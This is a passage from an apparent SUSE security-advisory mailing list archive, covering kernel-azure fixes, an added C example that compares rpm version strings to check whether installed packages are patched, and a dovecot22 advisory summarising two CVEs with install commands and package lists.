- scsi: mpt3sas: Fix nvme drives checking for tlr (bsc#1117108). - scsi: mpt3sas: fix oops in error handlers after shutdown/unload (bsc#1117108). - scsi: mpt3sas: Fix possibility of using invalid Enclosure Handle for SAS device after host reset (bsc#1117108). - scsi: mpt3sas: fix possible memory leak (bsc#1117108). - scsi: mpt3sas: fix pr_info message continuation (bsc#1117108). - scsi: mpt3sas: Fix removal and addition of vSES device during host reset (bsc#1117108). - scsi: mpt3sas: Fix sparse warnings (bsc#1117108). - scsi: mpt3sas: fix spelling mistake: "disbale" -> "disable" (bsc#1117108). - scsi: mpt3sas: For NVME device, issue a protocol level reset (bsc#1117108). - scsi: mpt3sas: Handle NVMe PCIe device related events generated from firmware (bsc#1117108). - scsi: mpt3sas: Improve kernel-doc headers (bsc#1117108). - scsi: mpt3sas: Incorrect command status was set/marked as not used (bsc#1117108). - scsi: mpt3sas: Increase event log buffer to support 24 port HBA's (bsc#1117108). - scsi: mpt3sas: Introduce API to get BAR0 mapped buffer address (bsc#1117108). - scsi: mpt3sas: Introduce Base function for cloning (bsc#1117108). - scsi: mpt3sas: Introduce function to clone mpi reply (bsc#1117108). - scsi: mpt3sas: Introduce function to clone mpi request (bsc#1117108). - scsi: mpt3sas: Introduce mpt3sas_get_st_from_smid() (bsc#1117108). - scsi: mpt3sas: Introduce struct mpt3sas_nvme_cmd (bsc#1117108). - scsi: mpt3sas: Lockless access for chain buffers (bsc#1117108). - scsi: mpt3sas: lockless command submission (bsc#1117108). - scsi: mpt3sas: make function _get_st_from_smid static (bsc#1117108). - scsi: mpt3sas: NVMe drive support for BTDHMAPPING ioctl command and log info (bsc#1117108). - scsi: mpt3sas: open-code _scsih_scsi_lookup_get() (bsc#1117108). - scsi: mpt3sas: Optimize I/O memory consumption in driver (bsc#1117108). - scsi: mpt3sas: Pre-allocate RDPQ Array at driver boot time (bsc#1117108). 
- scsi: mpt3sas: Processing of Cable Exception events (bsc#1117108). - scsi: mpt3sas: Reduce memory footprint in kdump kernel (bsc#1117108). - scsi: mpt3sas: remove a stray KERN_INFO (bsc#1117108). - scsi: mpt3sas: Remove KERN_WARNING from panic uses (bsc#1117108). - scsi: mpt3sas: remove redundant copy_from_user in _ctl_getiocinfo (bsc#1117108). - scsi: mpt3sas: remove redundant wmb (bsc#1117108). - scsi: mpt3sas: Remove set-but-not-used variables (bsc#1117108). - scsi: mpt3sas: Remove unnecessary parentheses and simplify null checks (bsc#1117108). - scsi: mpt3sas: Remove unused macro MPT3SAS_FMT (bsc#1117108). - scsi: mpt3sas: Remove unused variable requeue_event (bsc#1117108). - scsi: mpt3sas: Replace PCI pool old API (bsc#1117108). - scsi: mpt3sas: Replace PCI pool old API (bsc#1117108). - scsi: mpt3sas: Report Firmware Package Version from HBA Driver (bsc#1117108). - scsi: mpt3sas: scan and add nvme device after controller reset (bsc#1117108). - scsi: mpt3sas: separate out _base_recovery_check() (bsc#1117108). - scsi: mpt3sas: set default value for cb_idx (bsc#1117108). - scsi: mpt3sas: Set NVMe device queue depth as 128 (bsc#1117108). - scsi: mpt3sas: SGL to PRP Translation for I/Os to NVMe devices (bsc#1117108). - scsi: mpt3sas: simplify mpt3sas_scsi_issue_tm() (bsc#1117108). - scsi: mpt3sas: simplify task management functions (bsc#1117108). - scsi: mpt3sas: simplify _wait_for_commands_to_complete() (bsc#1117108). - scsi: mpt3sas: Split _base_reset_handler(), mpt3sas_scsih_reset_handler() and mpt3sas_ctl_reset_handler() (bsc#1117108). - scsi: mpt3sas: Swap I/O memory read value back to cpu endianness (bsc#1117108). - scsi: mpt3sas: switch to generic DMA API (bsc#1117108). - scsi: mpt3sas: switch to pci_alloc_irq_vectors (bsc#1117108). - scsi: mpt3sas: Updated MPI headers to v2.00.48 (bsc#1117108). - scsi: mpt3sas: Update driver version "25.100.00.00" (bsc#1117108). - scsi: mpt3sas: Update driver version "26.100.00.00" (bsc#1117108). 
- scsi: mpt3sas: Update MPI Headers (bsc#1117108). - scsi: mpt3sas: Update mpt3sas driver version (bsc#1117108). - scsi: mpt3sas: Use dma_pool_zalloc (bsc#1117108). - scsi: mpt3sas: use list_splice_init() (bsc#1117108). - scsi: mpt3sas: wait for and flush running commands on shutdown/unload (bsc#1117108). - scsi: qla2xxx: Fix deadlock between ATIO and HW lock (bsc#1125794). - scsi: qla2xxx: Fix early srb free on abort (bsc#1121713). - scsi: qla2xxx: Fix for double free of SRB structure (bsc#1121713). - scsi: qla2xxx: Increase abort timeout value (bsc#1121713). - scsi: qla2xxx: Move {get|rel}_sp to base_qpair struct (bsc#1121713). - scsi: qla2xxx: Return switch command on a timeout (bsc#1121713). - scsi: qla2xxx: Turn off IOCB timeout timer on IOCB completion (bsc#1121713). - scsi: qla2xxx: Use correct qpair for ABTS/CMD (bsc#1121713). - scsi: sd: Fix cache_type_store() (bnc#1012382). - scsi: sym53c8xx: fix NULL pointer dereference panic in sym_int_sir() (bsc#1125315). - scsi: target: make the pi_prot_format ConfigFS path readable (bsc#1123933). - scsi: target: use consistent left-aligned ASCII INQUIRY data (bnc#1012382). - sctp: allocate sctp_sockaddr_entry with kzalloc (bnc#1012382). - sd: disable logical block provisioning if 'lbpme' is not set (bsc#1086095 bsc#1078355). - selinux: fix GPF on invalid policy (bnc#1012382). - seq_buf: Make seq_buf_puts() null-terminate the buffer (bnc#1012382). - serial: fsl_lpuart: clear parity enable bit when disable parity (bnc#1012382). - series.conf: Move 'patches.fixes/aio-hold-an-extra-file-reference-over-AIO-read-write.patch' into sorted section. - signal: Always notice exiting tasks (bnc#1012382). - signal: Better detection of synchronous signals (bnc#1012382). - signal: Restore the stop PTRACE_EVENT_EXIT (bnc#1012382). - skge: potential memory corruption in skge_get_regs() (bnc#1012382). - sky2: Increase D3 delay again (bnc#1012382). 
- slab: alien caches must not be initialized if the allocation of the alien cache failed (bnc#1012382). - smack: fix access permissions for keyring (bnc#1012382). - smsc95xx: Use skb_cow_head to deal with cloned skbs (bnc#1012382). - soc/tegra: Do not leak device tree node reference (bnc#1012382). - staging:iio:ad2s90: Make probe handle spi_setup failure (bnc#1012382). - staging: iio: ad7780: update voltage on read (bnc#1012382). - staging: iio: adc: ad7280a: handle error from __ad7280_read32() (bnc#1012382). - staging: rtl8188eu: Add device code for D-Link DWA-121 rev B1 (bnc#1012382). - sunrpc: handle ENOMEM in rpcb_getport_async (bnc#1012382). - sunvdc: Do not spin in an infinite loop when vio_ldc_send() returns EAGAIN (bnc#1012382). - sysfs: Disable lockdep for driver bind/unbind files (bnc#1012382). - tcp: clear icsk_backoff in tcp_write_queue_purge() (bnc#1012382). - tcp: tcp_v4_err() should be more careful (bnc#1012382). - team: avoid complex list operations in team_nl_cmd_options_set() (bnc#1012382). - team: Free BPF filter when unregistering netdev (git-fixes). - test_hexdump: use memcpy instead of strncpy (bnc#1012382). - thermal: hwmon: inline helpers when CONFIG_THERMAL_HWMON is not set (bnc#1012382). - timekeeping: Use proper seqcount initializer (bnc#1012382). - tipc: fix uninit-value in tipc_nl_compat_bearer_enable (bnc#1012382). - tipc: fix uninit-value in tipc_nl_compat_doit (bnc#1012382). - tipc: fix uninit-value in tipc_nl_compat_link_reset_stats (bnc#1012382). - tipc: fix uninit-value in tipc_nl_compat_link_set (bnc#1012382). - tipc: fix uninit-value in tipc_nl_compat_name_table_dump (bnc#1012382). - tipc: use destination length for copy string (bnc#1012382). - tracing: Do not free iter->trace in fail path of tracing_open_pipe() (bsc#1129581). - tracing/uprobes: Fix output for multiple string arguments (bnc#1012382). - tty: Do not block on IO when ldisc change is pending (bnc#1105428). 
- tty: Do not hold ldisc lock in tty_reopen() if ldisc present (bnc#1105428). - tty: fix data race between tty_init_dev and flush of buf (bnc#1105428). - tty: Handle problem if line discipline does not have receive_buf (bnc#1012382). - tty: Hold tty_ldisc_lock() during tty_reopen() (bnc#1105428). - tty/ldsem: Add lockdep asserts for ldisc_sem (bnc#1105428). - tty/ldsem: Convert to regular lockdep annotations (bnc#1105428). - tty/ldsem: Decrement wait_readers on timeouted down_read() (bnc#1105428). - tty/ldsem: Wake up readers after timed out down_write() (bnc#1012382). - tty/n_hdlc: fix __might_sleep warning (bnc#1012382). - tty: serial: samsung: Properly set flags in autoCTS mode (bnc#1012382). - tty: Simplify tty->count math in tty_reopen() (bnc#1105428). - uapi/if_ether.h: move __UAPI_DEF_ETHHDR libc define (bnc#1012382). - uapi/if_ether.h: prevent redefinition of struct ethhdr (bnc#1012382). - ucc_geth: Reset BQL queue when stopping device (bnc#1012382). - udf: Fix BUG on corrupted inode (bnc#1012382). - um: Avoid marking pages with "changed protection" (bnc#1012382). - usb: Add USB_QUIRK_DELAY_CTRL_MSG quirk for Corsair K70 RGB (bnc#1012382). - usb: cdc-acm: send ZLP for Telit 3G Intel based modems (bnc#1012382). - usb: dwc2: Remove unnecessary kfree (bnc#1012382). - usb: gadget: udc: net2272: Fix bitwise and boolean operations (bnc#1012382). - usb: hub: delay hub autosuspend if USB3 port is still link training (bnc#1012382). - usb: phy: am335x: fix race condition in _probe (bnc#1012382). - usb: serial: pl2303: add new PID to support PL2303TB (bnc#1012382). - usb: serial: simple: add Motorola Tetra TPG2200 device id (bnc#1012382). - usb: storage: add quirk for SMI SM3350 (bnc#1012382). - usb: storage: do not insert sane sense for SPC3+ when bad sense specified (bnc#1012382). - video: clps711x-fb: release disp device node in probe() (bnc#1012382). - vsock: cope with memory allocation failure at socket creation time (bnc#1012382). 
- vt: invoke notifier on screen size change (bnc#1012382). - vxlan: test dev->flags & IFF_UP before calling netif_rx() (bnc#1012382). - wireless: airo: potential buffer overflow in sprintf() (bsc#1120902). - writeback: do not decrement wb->refcnt if !wb->bdi (git fixes (writeback)). - x86: Add TSX Force Abort CPUID/MSR (bsc#1121805). - x86/a.out: Clear the dump structure initially (bnc#1012382). - x86/fpu: Add might_fault() to user_insn() (bnc#1012382). - x86/kaslr: Fix incorrect i8254 outb() parameters (bnc#1012382). - x86: livepatch: Treat R_X86_64_PLT32 as R_X86_64_PC32 (bnc#1012382). - x86/MCE: Initialize mce.bank in the case of a fatal error in mce_no_way_out() (bnc#1012382). - x86/PCI: Fix Broadcom CNB20LE unintended sign extension (redux) (bnc#1012382). - x86/pkeys: Properly copy pkey state at fork() (bsc#1106105). - x86/platform/UV: Use efi_runtime_lock to serialise BIOS calls (bnc#1012382). - x86: respect memory size limiting via mem= parameter (bsc#1117645). - x86/xen: dont add memory above max allowed allocation (bsc#1117645). - xen, cpu_hotplug: Prevent an out of bounds access (bsc#1065600). - xen: remove pre-xen3 fallback handlers (bsc#1065600). - xfrm6_tunnel: Fix spi check in __xfrm6_tunnel_alloc_spi (bnc#1012382). - xfrm: refine validation of template and selector families (bnc#1012382). - Yama: Check for pid death before checking ancestry (bnc#1012382). - xfs: remove filestream item xfs_inode reference (bsc#1127961). Special Instructions and Notes: Please reboot the system after installing this update. Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". 
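When auditing many hosts you often only have package version strings rather than a shell with zypper on each box, and deciding "is this at or above the fixed build" needs rpm's segment-wise comparison, not a string compare (19.14 is newer than 19.9). The following is an added example, not SUSE's or rpm's own code: it reimplements rpm's version comparison and checks an installed VERSION-RELEASE against the fixed one named in an advisory (4.4.176-4.25.1 for kernel-azure in this one; the dovecot22 and SDL builds further down are used the same way). The installed versions in main() are constructed for illustration, and the code assumes no epoch and no caret segments.

```c
/* Added example (not SUSE's or rpm's code): decide whether an installed
 * package is at or above the fixed build named in an advisory, using a
 * reimplementation of rpm's version-segment comparison (rpmvercmp).
 * Assumptions: no epoch, no '^' segments, VERSION-RELEASE split at the
 * last '-'. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Compare two version or release strings segment by segment: numeric
 * segments by magnitude (19.14 > 19.9), alphabetic ones lexically, '~'
 * sorting before anything including end of string, and a string with
 * segments left over counting as newer. Returns -1, 0 or 1. */
static int rpm_vercmp(const char *a, const char *b)
{
    if (strcmp(a, b) == 0)
        return 0;
    while (*a || *b) {
        /* separators ('.', '-', '_', ...) only delimit segments */
        while (*a && !isalnum((unsigned char)*a) && *a != '~') a++;
        while (*b && !isalnum((unsigned char)*b) && *b != '~') b++;
        if (*a == '~' || *b == '~') {
            if (*a != '~') return 1;
            if (*b != '~') return -1;
            a++; b++;
            continue;
        }
        if (!*a || !*b)
            break;
        const char *ea = a, *eb = b;
        int isnum = isdigit((unsigned char)*a) != 0;
        if (isnum) {
            while (isdigit((unsigned char)*ea)) ea++;
            while (isdigit((unsigned char)*eb)) eb++;
        } else {
            while (isalpha((unsigned char)*ea)) ea++;
            while (isalpha((unsigned char)*eb)) eb++;
        }
        if (eb == b)                 /* segment types differ: */
            return isnum ? 1 : -1;   /* numeric counts as newer */
        const char *sa = a, *sb = b;
        if (isnum) {                 /* drop leading zeros; more digits wins */
            while (sa < ea && *sa == '0') sa++;
            while (sb < eb && *sb == '0') sb++;
            if (ea - sa != eb - sb)
                return (ea - sa > eb - sb) ? 1 : -1;
        }
        size_t la = (size_t)(ea - sa), lb = (size_t)(eb - sb);
        size_t n = la < lb ? la : lb;
        int rc = memcmp(sa, sb, n);
        if (rc)
            return rc < 0 ? -1 : 1;
        if (la != lb)                /* "ab" < "abc", as strcmp would say */
            return la < lb ? -1 : 1;
        a = ea;
        b = eb;
    }
    if (!*a && !*b)
        return 0;
    return *a ? 1 : -1;              /* leftover segments win */
}

/* Split "VERSION-RELEASE" at the last '-'; returns 0 if it does not fit. */
static int split_vr(const char *vr, char *ver, size_t vsz, char *rel, size_t rsz)
{
    const char *dash = strrchr(vr, '-');
    size_t vlen = dash ? (size_t)(dash - vr) : strlen(vr);
    const char *r = dash ? dash + 1 : "";
    if (vlen >= vsz || strlen(r) >= rsz)
        return 0;
    memcpy(ver, vr, vlen);
    ver[vlen] = '\0';
    strcpy(rel, r);
    return 1;
}

/* Compare two VERSION-RELEASE strings: -1/0/1, or -2 on malformed input. */
int rpm_vrcmp(const char *a, const char *b)
{
    char va[128], ra[128], vb[128], rb[128];
    if (!split_vr(a, va, sizeof va, ra, sizeof ra) ||
        !split_vr(b, vb, sizeof vb, rb, sizeof rb))
        return -2;
    int rc = rpm_vercmp(va, vb);
    return rc ? rc : rpm_vercmp(ra, rb);
}

/* 1 if the installed build is at or above the fixed one. Malformed input
 * is reported as not fixed, the conservative answer for an audit. */
int pkg_is_fixed(const char *installed, const char *fixed)
{
    return rpm_vrcmp(installed, fixed) >= 0;
}

int main(void)
{
    /* fixed builds from the advisories; installed ones are constructed */
    static const struct { const char *pkg, *installed, *fixed; } checks[] = {
        { "kernel-azure", "4.4.175-4.22.1", "4.4.176-4.25.1" },
        { "kernel-azure", "4.4.176-4.25.1", "4.4.176-4.25.1" },
        { "dovecot22",    "2.2.31-19.9.2",  "2.2.31-19.14.2" },
        { "libSDL-1_2-0", "1.2.15-15.11.1", "1.2.15-15.11.1" },
    };
    for (size_t i = 0; i < sizeof checks / sizeof checks[0]; i++)
        printf("%-13s %-16s %s\n", checks[i].pkg, checks[i].installed,
               pkg_is_fixed(checks[i].installed, checks[i].fixed)
                   ? "fixed" : "VULNERABLE");
    return 0;
}
```

Feed it the output of `rpm -q --qf '%{VERSION}-%{RELEASE}\n' <package>`. For the kernel packages an installed RPM is not enough: the advisory asks for a reboot, so also confirm that the running kernel (`uname -r`) is the patched build before closing the finding.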
Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-901=1 Package List: - SUSE Linux Enterprise Server 12-SP3 (x86_64): kernel-azure-4.4.176-4.25.1 kernel-azure-base-4.4.176-4.25.1 kernel-azure-base-debuginfo-4.4.176-4.25.1 kernel-azure-debuginfo-4.4.176-4.25.1 kernel-azure-debugsource-4.4.176-4.25.1 kernel-azure-devel-4.4.176-4.25.1 kernel-syms-azure-4.4.176-4.25.1 - SUSE Linux Enterprise Server 12-SP3 (noarch): kernel-devel-azure-4.4.176-4.25.1 kernel-source-azure-4.4.176-4.25.1 References: https://www.suse.com/security/cve/CVE-2017-18249.html https://www.suse.com/security/cve/CVE-2019-2024.html https://www.suse.com/security/cve/CVE-2019-3459.html https://www.suse.com/security/cve/CVE-2019-3460.html https://www.suse.com/security/cve/CVE-2019-6974.html https://www.suse.com/security/cve/CVE-2019-7221.html https://www.suse.com/security/cve/CVE-2019-7222.html https://www.suse.com/security/cve/CVE-2019-9213.html https://bugzilla.suse.com/1012382 https://bugzilla.suse.com/1020413 https://bugzilla.suse.com/1023175 https://bugzilla.suse.com/1031492 https://bugzilla.suse.com/1042286 https://bugzilla.suse.com/1050549 https://bugzilla.suse.com/1065600 https://bugzilla.suse.com/1070767 https://bugzilla.suse.com/1075697 https://bugzilla.suse.com/1078355 https://bugzilla.suse.com/1082943 https://bugzilla.suse.com/1086095 https://bugzilla.suse.com/1086652 https://bugzilla.suse.com/1087036 https://bugzilla.suse.com/1087092 https://bugzilla.suse.com/1090435 https://bugzilla.suse.com/1094823 https://bugzilla.suse.com/1099810 https://bugzilla.suse.com/1102875 https://bugzilla.suse.com/1102877 https://bugzilla.suse.com/1102879 https://bugzilla.suse.com/1102882 https://bugzilla.suse.com/1102896 https://bugzilla.suse.com/1102959 https://bugzilla.suse.com/1103429 https://bugzilla.suse.com/1105428 https://bugzilla.suse.com/1106061 https://bugzilla.suse.com/1106105 
https://bugzilla.suse.com/1106929 https://bugzilla.suse.com/1107866 https://bugzilla.suse.com/1109137 https://bugzilla.suse.com/1109248 https://bugzilla.suse.com/1109695 https://bugzilla.suse.com/1114893 https://bugzilla.suse.com/1116345 https://bugzilla.suse.com/1116653 https://bugzilla.suse.com/1117108 https://bugzilla.suse.com/1117645 https://bugzilla.suse.com/1117744 https://bugzilla.suse.com/1119019 https://bugzilla.suse.com/1119680 https://bugzilla.suse.com/1119843 https://bugzilla.suse.com/1120017 https://bugzilla.suse.com/1120691 https://bugzilla.suse.com/1120722 https://bugzilla.suse.com/1120758 https://bugzilla.suse.com/1120902 https://bugzilla.suse.com/1121713 https://bugzilla.suse.com/1121726 https://bugzilla.suse.com/1121805 https://bugzilla.suse.com/1122650 https://bugzilla.suse.com/1122651 https://bugzilla.suse.com/1122779 https://bugzilla.suse.com/1122885 https://bugzilla.suse.com/1123321 https://bugzilla.suse.com/1123323 https://bugzilla.suse.com/1123357 https://bugzilla.suse.com/1123933 https://bugzilla.suse.com/1124166 https://bugzilla.suse.com/1124235 https://bugzilla.suse.com/1124728 https://bugzilla.suse.com/1124732 https://bugzilla.suse.com/1124735 https://bugzilla.suse.com/1124775 https://bugzilla.suse.com/1124777 https://bugzilla.suse.com/1124780 https://bugzilla.suse.com/1124811 https://bugzilla.suse.com/1125000 https://bugzilla.suse.com/1125014 https://bugzilla.suse.com/1125315 https://bugzilla.suse.com/1125446 https://bugzilla.suse.com/1125794 https://bugzilla.suse.com/1125796 https://bugzilla.suse.com/1125808 https://bugzilla.suse.com/1125809 https://bugzilla.suse.com/1125810 https://bugzilla.suse.com/1125892 https://bugzilla.suse.com/1126389 https://bugzilla.suse.com/1126772 https://bugzilla.suse.com/1126773 https://bugzilla.suse.com/1126805 https://bugzilla.suse.com/1127082 https://bugzilla.suse.com/1127155 https://bugzilla.suse.com/1127561 https://bugzilla.suse.com/1127725 https://bugzilla.suse.com/1127731 
https://bugzilla.suse.com/1127961 https://bugzilla.suse.com/1128166 https://bugzilla.suse.com/1128452 https://bugzilla.suse.com/1128565 https://bugzilla.suse.com/1128696 https://bugzilla.suse.com/1128756 https://bugzilla.suse.com/1128893 https://bugzilla.suse.com/1129080 https://bugzilla.suse.com/1129179 https://bugzilla.suse.com/1129237 https://bugzilla.suse.com/1129238 https://bugzilla.suse.com/1129239 https://bugzilla.suse.com/1129240 https://bugzilla.suse.com/1129241 https://bugzilla.suse.com/1129413 https://bugzilla.suse.com/1129414 https://bugzilla.suse.com/1129415 https://bugzilla.suse.com/1129416 https://bugzilla.suse.com/1129417 https://bugzilla.suse.com/1129418 https://bugzilla.suse.com/1129419 https://bugzilla.suse.com/1129581 https://bugzilla.suse.com/1129770 https://bugzilla.suse.com/1129923 From sle-security-updates at lists.suse.com Mon Apr 8 07:30:52 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 8 Apr 2019 15:30:52 +0200 (CEST) Subject: SUSE-SU-2019:0900-1: important: Security update for dovecot22 Message-ID: <20190408133052.499D8F7BB@maintenance.suse.de> SUSE Security Update: Security update for dovecot22 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0900-1 Rating: important References: #1111789 #1123022 #1130116 Cross-References: CVE-2019-3814 CVE-2019-7524 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server for SAP 12-SP1 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Server 12-LTSS SUSE Enterprise Storage 4 ______________________________________________________________________________ An update 
that solves two vulnerabilities and has one fix is now available. Description: This update for dovecot22 fixes the following issues: Security issues fixed: - CVE-2019-7524: Fixed a stack-based buffer overflow caused by missing input-buffer size checks when reading an FTS or POP3-UIDL header from a dovecot index file; a local attacker could overflow the indexer-worker process and elevate to root (bsc#1130116). - CVE-2019-3814: Fixed a flaw in SSL client certificate authentication: when ssl_cert_username_field named a field that the presented, otherwise trusted, client certificate did not contain, the certificate was not checked against the login username, so the holder of such a certificate could log in as another user (bsc#1123022). Other issue fixed: - Fixed handling of command continuation (bsc#1111789). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-900=1 - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-900=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-900=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-900=1 - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-900=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-900=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-900=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-900=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-900=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-900=1 - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-900=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-900=1 Package List: - SUSE OpenStack Cloud 7 (s390x x86_64): dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 
dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 dovecot22-devel-2.2.31-19.14.2 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 dovecot22-devel-2.2.31-19.14.2 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): 
dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 
dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 - SUSE Enterprise Storage 4 (x86_64): dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 References: https://www.suse.com/security/cve/CVE-2019-3814.html https://www.suse.com/security/cve/CVE-2019-7524.html https://bugzilla.suse.com/1111789 https://bugzilla.suse.com/1123022 https://bugzilla.suse.com/1130116 From sle-security-updates at lists.suse.com Mon Apr 8 07:33:54 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 8 Apr 2019 15:33:54 +0200 (CEST) Subject: SUSE-SU-2019:0899-1: moderate: Security update for SDL Message-ID: <20190408133354.71C55F7BB@maintenance.suse.de> SUSE Security Update: Security update for SDL ______________________________________________________________________________ 